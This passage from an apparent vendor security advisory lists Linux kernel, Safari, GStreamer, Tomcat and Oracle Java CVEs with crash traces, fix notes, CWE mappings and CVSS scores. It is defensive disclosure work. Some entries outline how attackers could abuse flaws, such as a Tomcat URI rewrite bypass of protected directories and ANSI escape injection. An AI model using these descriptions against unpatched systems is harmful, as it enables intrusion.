In the Linux kernel, the following vulnerability has been resolved:

ocfs2: prevent release journal inode after journal shutdown

Before calling ocfs2_delete_osb(), ocfs2_journal_shutdown() has already been executed in ocfs2_dismount_volume(), so osb->journal must be NULL. Therefore, the following calltrace will inevitably fail when it reaches jbd2_journal_release_jbd_inode().

ocfs2_dismount_volume()->
  ocfs2_delete_osb()->
    ocfs2_free_slot_info()->
      __ocfs2_free_slot_info()->
        evict()->
          ocfs2_evict_inode()->
            ocfs2_clear_inode()->
              jbd2_journal_release_jbd_inode(osb->journal->j_journal,

Adding osb->journal checks will prevent null-ptr-deref during the above execution path.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39843
In the Linux kernel, the following vulnerability has been resolved:

mm: slub: avoid wake up kswapd in set_track_prepare

set_track_prepare() can incur lock recursion.
The issue is that it is called from hrtimer_start_range_ns holding the per_cpu(hrtimer_bases)[n].lock, but when enabled CONFIG_DEBUG_OBJECTS_TIMERS, may wake up kswapd in set_track_prepare, and try to hold the per_cpu(hrtimer_bases)[n].lock. Avoid deadlock caused by implicitly waking up kswapd by passing in allocation flags, which do not contain __GFP_KSWAPD_RECLAIM in the debug_objects_fill_pool() case. Inside stack depot they are processed by gfp_nested_mask(). Since ___slab_alloc() has preemption disabled, we mask out __GFP_DIRECT_RECLAIM from the flags there. The oops looks something like: BUG: spinlock recursion on CPU#3, swapper/3/0 lock: 0xffffff8a4bf29c80, .magic: dead4ead, .owner: swapper/3/0, .owner_cpu: 3 Hardware name: Qualcomm Technologies, Inc. Popsicle based on SM8850 (DT) Call trace: spin_bug+0x0 _raw_spin_lock_irqsave+0x80 hrtimer_try_to_cancel+0x94 task_contending+0x10c enqueue_dl_entity+0x2a4 dl_server_start+0x74 enqueue_task_fair+0x568 enqueue_task+0xac do_activate_task+0x14c ttwu_do_activate+0xcc try_to_wake_up+0x6c8 default_wake_function+0x20 autoremove_wake_function+0x1c __wake_up+0xac wakeup_kswapd+0x19c wake_all_kswapds+0x78 __alloc_pages_slowpath+0x1ac __alloc_pages_noprof+0x298 stack_depot_save_flags+0x6b0 stack_depot_save+0x14 set_track_prepare+0x5c ___slab_alloc+0xccc __kmalloc_cache_noprof+0x470 __set_page_owner+0x2bc post_alloc_hook[jt]+0x1b8 prep_new_page+0x28 get_page_from_freelist+0x1edc __alloc_pages_noprof+0x13c alloc_slab_page+0x244 allocate_slab+0x7c ___slab_alloc+0x8e8 kmem_cache_alloc_noprof+0x450 debug_objects_fill_pool+0x22c debug_object_activate+0x40 enqueue_hrtimer[jt]+0xdc hrtimer_start_range_ns+0x5f8 ... 
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39844
In the Linux kernel, the following vulnerability has been resolved:

mm: move page table sync declarations to linux/pgtable.h

During our internal testing, we started observing intermittent boot failures when the machine uses 4-level paging and has a large amount of persistent memory:

  BUG: unable to handle page fault for address: ffffe70000000034
  #PF: supervisor write access in kernel mode
  #PF: error_code(0x0002) - not-present page
  PGD 0 P4D 0
  Oops: 0002 [#1] SMP NOPTI
  RIP: 0010:__init_single_page+0x9/0x6d
  Call Trace:
    __init_zone_device_page+0x17/0x5d
    memmap_init_zone_device+0x154/0x1bb
    pagemap_range+0x2e0/0x40f
    memremap_pages+0x10b/0x2f0
    devm_memremap_pages+0x1e/0x60
    dev_dax_probe+0xce/0x2ec [device_dax]
    dax_bus_probe+0x6d/0xc9
    [... snip ...]

It turns out that the kernel panics while initializing vmemmap (struct page array) when the vmemmap region spans two PGD entries, because the new PGD entry is only installed in init_mm.pgd, but not in the page tables of other tasks.

And looking at __populate_section_memmap():

  if (vmemmap_can_optimize(altmap, pgmap))
      // does not sync top level page tables
      r = vmemmap_populate_compound_pages(pfn, start, end, nid, pgmap);
  else
      // sync top level page tables in x86
      r = vmemmap_populate(start, end, nid, altmap);

In the normal path, vmemmap_populate() in arch/x86/mm/init_64.c synchronizes the top level page table (See commit 9b861528a801 ("x86-64, mem: Update all PGDs for direct mapping and vmemmap mapping changes")) so that all tasks in the system can see the new vmemmap area.

However, when vmemmap_can_optimize() returns true, the optimized path skips synchronization of top-level page tables. This is because vmemmap_populate_compound_pages() is implemented in core MM code, which does not handle synchronization of the top-level page tables. Instead, the core MM has historically relied on each architecture to perform this synchronization manually.

We're not the first party to encounter a crash caused by not-sync'd top level page tables: earlier this year, Gwan-gyeong Mun attempted to address the issue [1] [2] after hitting a kernel panic when x86 code accessed the vmemmap area before the corresponding top-level entries were synced. At that time, the issue was believed to be triggered only when struct page was enlarged for debugging purposes, and the patch did not get further updates.

It turns out that the current approach of relying on each arch to handle the page table sync manually is fragile because 1) it's easy to forget to sync the top level page table, and 2) it's also easy to overlook that the kernel should not access the vmemmap and direct mapping areas before the sync.

# The solution: Make page table sync code more robust and harder to miss

To address this, Dave Hansen suggested [3] [4] introducing {pgd,p4d}_populate_kernel() for updating kernel portion of the page tables and allow each architecture to explicitly perform synchronization when installing top-level entries. With this approach, we no longer need to worry about missing the sync step, reducing the risk of future regressions.

The new interface reuses existing ARCH_PAGE_TABLE_SYNC_MASK, PGTBL_P*D_MODIFIED and arch_sync_kernel_mappings() facility used by vmalloc and ioremap to synchronize page tables.

pgd_populate_kernel() looks like this:

  static inline void pgd_populate_kernel(unsigned long addr, pgd_t *pgd, p4d_t *p4d)
  {
      pgd_populate(&init_mm, pgd, p4d);
      if (ARCH_PAGE_TABLE_SYNC_MASK & PGTBL_PGD_MODIFIED)
          arch_sync_kernel_mappings(addr, addr);
  }

It is worth noting that vmalloc() and apply_to_range() carefully synchronize page tables by calling p*d_alloc_track() and arch_sync_kernel_mappings(), and thus they are not affected by ---truncated---

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39845
In the Linux kernel, the following vulnerability has been resolved:

x86/mm/64: define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings()

Define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to ensure page tables are properly synchronized when calling p*d_populate_kernel().

For 5-level paging, synchronization is performed via pgd_populate_kernel(). In 4-level paging, pgd_populate() is a no-op, so synchronization is instead performed at the P4D level via p4d_populate_kernel().

This fixes intermittent boot failures on systems using 4-level paging and a large amount of persistent memory:

  BUG: unable to handle page fault for address: ffffe70000000034
  #PF: supervisor write access in kernel mode
  #PF: error_code(0x0002) - not-present page
  PGD 0 P4D 0
  Oops: 0002 [#1] SMP NOPTI
  RIP: 0010:__init_single_page+0x9/0x6d
  Call Trace:
    __init_zone_device_page+0x17/0x5d
    memmap_init_zone_device+0x154/0x1bb
    pagemap_range+0x2e0/0x40f
    memremap_pages+0x10b/0x2f0
    devm_memremap_pages+0x1e/0x60
    dev_dax_probe+0xce/0x2ec [device_dax]
    dax_bus_probe+0x6d/0xc9
    [... snip ...]

It also fixes a crash in vmemmap_set_pmd() caused by accessing vmemmap before sync_global_pgds() [1]:

  BUG: unable to handle page fault for address: ffffeb3ff1200000
  #PF: supervisor write access in kernel mode
  #PF: error_code(0x0002) - not-present page
  PGD 0 P4D 0
  Oops: Oops: 0002 [#1] PREEMPT SMP NOPTI
  Tainted: [W]=WARN
  RIP: 0010:vmemmap_set_pmd+0xff/0x230
    vmemmap_populate_hugepages+0x176/0x180
    vmemmap_populate+0x34/0x80
    __populate_section_memmap+0x41/0x90
    sparse_add_section+0x121/0x3e0
    __add_pages+0xba/0x150
    add_pages+0x1d/0x70
    memremap_pages+0x3dc/0x810
    devm_memremap_pages+0x1c/0x60
    xe_devm_add+0x8b/0x100 [xe]
    xe_tile_init_noalloc+0x6a/0x70 [xe]
    xe_device_probe+0x48c/0x740 [xe]
    [... snip ...]

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39846
In the Linux kernel, the following vulnerability has been resolved:

pcmcia: Fix a NULL pointer dereference in __iodyn_find_io_region()

In __iodyn_find_io_region(), pcmcia_make_resource() is assigned to res and used in pci_bus_alloc_resource(). There is a dereference of res in pci_bus_alloc_resource(), which could lead to a NULL pointer dereference on failure of pcmcia_make_resource(). Fix this bug by adding a check of res.
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39847
In the Linux kernel, the following vulnerability has been resolved:

ppp: fix memory leak in pad_compress_skb

If alloc_skb() fails in pad_compress_skb(), it returns NULL without releasing the old skb. The caller does:

  skb = pad_compress_skb(ppp, skb);
  if (!skb)
      goto drop;
  drop:
      kfree_skb(skb);

When pad_compress_skb() returns NULL, the reference to the old skb is lost and kfree_skb(skb) ends up doing nothing, leading to a memory leak.

Align pad_compress_skb() semantics with realloc(): only free the old skb if allocation and compression succeed. At the call site, use the new_skb variable so the original skb is not lost when pad_compress_skb() fails.

Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39848
In the Linux kernel, the following vulnerability has been resolved:

ax25: properly unshare skbs in ax25_kiss_rcv()

Bernard Pidoux reported a regression apparently caused by commit c353e8983e0d ("net: introduce per netns packet chains"). skb->dev becomes NULL and we crash in __netif_receive_skb_core().

Before the above commit, different kinds of bugs or corruptions could happen without a major crash. But the root cause is that ax25_kiss_rcv() can queue/mangle input skb without checking if this skb is shared or not.

Many thanks to Bernard Pidoux for his help, diagnosis and tests.

We had a similar issue years ago fixed with commit 7aaed57c5c28 ("phonet: properly unshare skbs in phonet_rcv()").

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39849
In the Linux kernel, the following vulnerability has been resolved:

wifi: cfg80211: sme: cap SSID length in __cfg80211_connect_result()

If the ssid->datalen is more than IEEE80211_MAX_SSID_LEN (32), it would lead to memory corruption, so add some bounds checking.

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39853
In the Linux kernel, the following vulnerability has been resolved:

i40e: Fix potential invalid access when MAC list is empty

list_first_entry() never returns NULL - if the list is empty, it still returns a pointer to an invalid object, leading to potential invalid memory access when dereferenced.

Fix this by using list_first_entry_or_null instead of list_first_entry.

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39857
In the Linux kernel, the following vulnerability has been resolved:

net/smc: fix one NULL pointer dereference in smc_ib_is_sg_need_sync()

  BUG: kernel NULL pointer dereference, address: 00000000000002ec
  PGD 0 P4D 0
  Oops: Oops: 0000 [#1] SMP PTI
  CPU: 28 UID: 0 PID: 343 Comm: kworker/28:1 Kdump: loaded Tainted: G OE 6.17.0-rc2+ #9 NONE
  Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014
  Workqueue: smc_hs_wq smc_listen_work [smc]
  RIP: 0010:smc_ib_is_sg_need_sync+0x9e/0xd0 [smc]
  ...
  Call Trace:
    smcr_buf_map_link+0x211/0x2a0 [smc]
    __smc_buf_create+0x522/0x970 [smc]
    smc_buf_create+0x3a/0x110 [smc]
    smc_find_rdma_v2_device_serv+0x18f/0x240 [smc]
    ? smc_vlan_by_tcpsk+0x7e/0xe0 [smc]
    smc_listen_find_device+0x1dd/0x2b0 [smc]
    smc_listen_work+0x30f/0x580 [smc]
    process_one_work+0x18c/0x340
    worker_thread+0x242/0x360
    kthread+0xe7/0x220
    ret_from_fork+0x13a/0x160
    ret_from_fork_asm+0x1a/0x30

If the software RoCE device is used, ibdev->dma_device is a null pointer. As a result, the problem occurs. Null pointer detection is added to prevent problems.

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39860
In the Linux kernel, the following vulnerability has been resolved:

Bluetooth: Fix use-after-free in l2cap_sock_cleanup_listen()

syzbot reported the splat below without a repro.

In the splat, a single thread calling bt_accept_dequeue() freed sk and touched it after that.

The root cause would be the racy l2cap_sock_cleanup_listen() call added by the cited commit.

bt_accept_dequeue() is called under lock_sock() except for l2cap_sock_release().

Two threads could see the same socket during the list iteration in bt_accept_dequeue():

  CPU1                                   CPU2 (close())
  ----                                   ----
  sock_hold(sk)                          sock_hold(sk);
  lock_sock(sk)       <-- block close()
  sock_put(sk)
  bt_accept_unlink(sk)
    sock_put(sk)      <-- refcnt by bt_accept_enqueue()
  release_sock(sk)
                                         lock_sock(sk)
                                         sock_put(sk)
                                         bt_accept_unlink(sk)
                                           sock_put(sk)          <-- last refcnt
                                           bt_accept_unlink(sk)  <-- UAF

Depending on the timing, the other thread could show up in the "Freed by task" part.

Let's call l2cap_sock_cleanup_listen() under lock_sock() in l2cap_sock_release().
[0]:
  BUG: KASAN: slab-use-after-free in debug_spin_lock_before kernel/locking/spinlock_debug.c:86 [inline]
  BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x26f/0x2b0 kernel/locking/spinlock_debug.c:115
  Read of size 4 at addr ffff88803b7eb1c4 by task syz.5.3276/16995
  CPU: 3 UID: 0 PID: 16995 Comm: syz.5.3276 Not tainted syzkaller #0 PREEMPT(full)
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
  Call Trace:
    __dump_stack lib/dump_stack.c:94 [inline]
    dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120
    print_address_description mm/kasan/report.c:378 [inline]
    print_report+0xcd/0x630 mm/kasan/report.c:482
    kasan_report+0xe0/0x110 mm/kasan/report.c:595
    debug_spin_lock_before kernel/locking/spinlock_debug.c:86 [inline]
    do_raw_spin_lock+0x26f/0x2b0 kernel/locking/spinlock_debug.c:115
    spin_lock_bh include/linux/spinlock.h:356 [inline]
    release_sock+0x21/0x220 net/core/sock.c:3746
    bt_accept_dequeue+0x505/0x600 net/bluetooth/af_bluetooth.c:312
    l2cap_sock_cleanup_listen+0x5c/0x2a0 net/bluetooth/l2cap_sock.c:1451
    l2cap_sock_release+0x5c/0x210 net/bluetooth/l2cap_sock.c:1425
    __sock_release+0xb3/0x270 net/socket.c:649
    sock_close+0x1c/0x30 net/socket.c:1439
    __fput+0x3ff/0xb70 fs/file_table.c:468
    task_work_run+0x14d/0x240 kernel/task_work.c:227
    resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]
    exit_to_user_mode_loop+0xeb/0x110 kernel/entry/common.c:43
    exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]
    syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline]
    syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline]
    do_syscall_64+0x3f6/0x4c0 arch/x86/entry/syscall_64.c:100
    entry_SYSCALL_64_after_hwframe+0x77/0x7f
  RIP: 0033:0x7f2accf8ebe9

  Allocated by task 5326:
    kasan_save_stack+0x33/0x60 mm/kasan/common.c:47
    kasan_save_track+0x14/0x30 mm/kasan/common.c:68
    poison_kmalloc_redzone mm/kasan/common.c:388 [inline]
    __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:405
    kasan_kmalloc include/linux/kasan.h:260 [inline]
    __do_kmalloc_node mm/slub.c:4365 [inline]
    __kmalloc_nopro ---truncated---

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 7.1, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2025-39864
In the Linux kernel, the following vulnerability has been resolved:

wifi: cfg80211: fix use-after-free in cmp_bss()

Following bss_free() quirk introduced in commit 776b3580178f ("cfg80211: track hidden SSID networks properly"), adjust cfg80211_update_known_bss() to free the last beacon frame elements only if they're not shared via the corresponding 'hidden_beacon_bss' pointer.

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 7.8, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39865
In the Linux kernel, the following vulnerability has been resolved:

tee: fix NULL pointer dereference in tee_shm_put

tee_shm_put() has a NULL pointer dereference:

  __optee_disable_shm_cache
    --> shm = reg_pair_to_ptr(...);  // shm may be NULL
        tee_shm_free(shm);
          --> tee_shm_put(shm);      // crash

Add check in tee_shm_put to fix it.

panic log:

  Unable to handle kernel paging request at virtual address 0000000000100cca
  Mem abort info:
    ESR = 0x0000000096000004
    EC = 0x25: DABT (current EL), IL = 32 bits
    SET = 0, FnV = 0
    EA = 0, S1PTW = 0
    FSC = 0x04: level 0 translation fault
  Data abort info:
    ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
    CM = 0, WnR = 0, TnD = 0, TagAccess = 0
    GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
  user pgtable: 4k pages, 48-bit VAs, pgdp=0000002049d07000
  [0000000000100cca] pgd=0000000000000000, p4d=0000000000000000
  Internal error: Oops: 0000000096000004 [#1] SMP
  CPU: 2 PID: 14442 Comm: systemd-sleep Tainted: P OE ------- ---- 6.6.0-39-generic #38
  Source Version: 938b255f6cb8817c95b0dd5c8c2944acfce94b07
  Hardware name: greatwall GW-001Y1A-FTH, BIOS Great Wall BIOS V3.0 10/26/2022
  pstate: 80000005 (Nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
  pc : tee_shm_put+0x24/0x188
  lr : tee_shm_free+0x14/0x28
  sp : ffff001f98f9faf0
  Call trace:
    tee_shm_put+0x24/0x188
    tee_shm_free+0x14/0x28
    __optee_disable_shm_cache+0xa8/0x108
    optee_shutdown+0x28/0x38
    platform_shutdown+0x28/0x40
    device_shutdown+0x144/0x2b0
    kernel_power_off+0x3c/0x80
    hibernate+0x35c/0x388
    state_store+0x64/0x80
    kobj_attr_store+0x14/0x28
    sysfs_kf_write+0x48/0x60
    kernfs_fop_write_iter+0x128/0x1c0
    vfs_write+0x270/0x370
    ksys_write+0x6c/0x100
    __arm64_sys_write+0x20/0x30
    invoke_syscall+0x4c/0x120
    el0_svc_common.constprop.0+0x44/0xf0
    do_el0_svc+0x24/0x38
    el0_svc+0x24/0x88
    el0t_64_sync_handler+0x134/0x150
    el0t_64_sync+0x14c/0x15

Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39866
In the Linux kernel, the following vulnerability has been resolved:

fs: writeback: fix use-after-free in __mark_inode_dirty()

A use-after-free issue occurred when __mark_inode_dirty() gets a bdi_writeback that is in the process of switching.

  CPU: 1 PID: 562 Comm: systemd-random- Not tainted 6.6.56-gb4403bd46a8e #1
  ......
  pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
  pc : __mark_inode_dirty+0x124/0x418
  lr : __mark_inode_dirty+0x118/0x418
  sp : ffffffc08c9dbbc0
  ........
  Call trace:
    __mark_inode_dirty+0x124/0x418
    generic_update_time+0x4c/0x60
    file_modified+0xcc/0xd0
    ext4_buffered_write_iter+0x58/0x124
    ext4_file_write_iter+0x54/0x704
    vfs_write+0x1c0/0x308
    ksys_write+0x74/0x10c
    __arm64_sys_write+0x1c/0x28
    invoke_syscall+0x48/0x114
    el0_svc_common.constprop.0+0xc0/0xe0
    do_el0_svc+0x1c/0x28
    el0_svc+0x40/0xe4
    el0t_64_sync_handler+0x120/0x12c
    el0t_64_sync+0x194/0x198

Root cause is:

  systemd-random-seed                          kworker
  ----------------------------------------------------------------------
  ___mark_inode_dirty                          inode_switch_wbs_work_fn

    spin_lock(&inode->i_lock);
    inode_attach_wb
    locked_inode_to_wb_and_lock_list
      get inode->i_wb
      spin_unlock(&inode->i_lock);
      spin_lock(&wb->list_lock)
      spin_lock(&inode->i_lock)
    inode_io_list_move_locked
    spin_unlock(&wb->list_lock)
    spin_unlock(&inode->i_lock)
                                               spin_lock(&old_wb->list_lock)
                                                 inode_do_switch_wbs
                                                   spin_lock(&inode->i_lock)
                                                   inode->i_wb = new_wb
                                                   spin_unlock(&inode->i_lock)
                                               spin_unlock(&old_wb->list_lock)
                                               wb_put_many(old_wb, nr_switched)
                                                 cgwb_release
                                                   old wb released
    wb_wakeup_delayed() accesses wb,
    then trigger the use-after-free issue

Fix this race condition by holding the inode spinlock until wb_wakeup_delayed() has finished.

Relevant CWE: CWE-416 Use After Free
CVSS 3.1: Base Score 7.8, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-40300
In the Linux kernel, the following vulnerability has been resolved:

x86/vmscape: Add conditional IBPB mitigation

VMSCAPE is a vulnerability that exploits insufficient branch predictor isolation between a guest and a userspace hypervisor (like QEMU). Existing mitigations already protect kernel/KVM from a malicious guest. Userspace can additionally be protected by flushing the branch predictors after a VMexit.

Since it is the userspace that consumes the poisoned branch predictors, conditionally issue an IBPB after a VMexit and before returning to userspace. Workloads that frequently switch between hypervisor and userspace will incur the most overhead from the new IBPB.

This new IBPB is not integrated with the existing IBPB sites. For instance, a task can use the existing speculation control prctl() to get an IBPB at context switch time. With this implementation, the IBPB is doubled up: one at context switch and another before running userspace.

The intent is to integrate and optimize these cases post-embargo.

[ dhansen: elaborate on suboptimal IBPB solution ]

Relevant CWE: CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak')
CVSS 3.1: Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE-2025-43368
A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26, iOS 26 and iPadOS 26, macOS Tahoe 26. Processing maliciously crafted web content may lead to an unexpected Safari crash.

Relevant CWE: CWE-416 Use After Free
CVSS 3.1: Base Score 4.3, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2025-47219
In GStreamer through 1.26.1, the isomp4 plugin's qtdemux_parse_trak function may read past the end of a heap buffer while parsing an MP4 file, possibly leading to information disclosure.

Relevant CWE: CWE-125 Out-of-bounds Read
CVSS 3.1: Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2025-48989
Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108, which fix the issue.
Relevant CWE: CWE-404 Improper Resource Shutdown or Release
CVSS 3.1: Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-53057
Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).

Relevant CWE: CWE-284 Improper Access Control
CVSS 3.1: Base Score 5.9, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2025-53066
Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSS 3.1: Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2025-55752
Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Relevant CWE: CWE-23 Relative Path Traversal
CVSS 3.1: Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-55754
Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Relevant CWE: CWE-150 Improper Neutralization of Escape, Meta, or Control Sequences
CVSS 3.1: Base Score 9.6, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2025-61748
Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 21.0.8 and 25; Oracle GraalVM for JDK: 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: 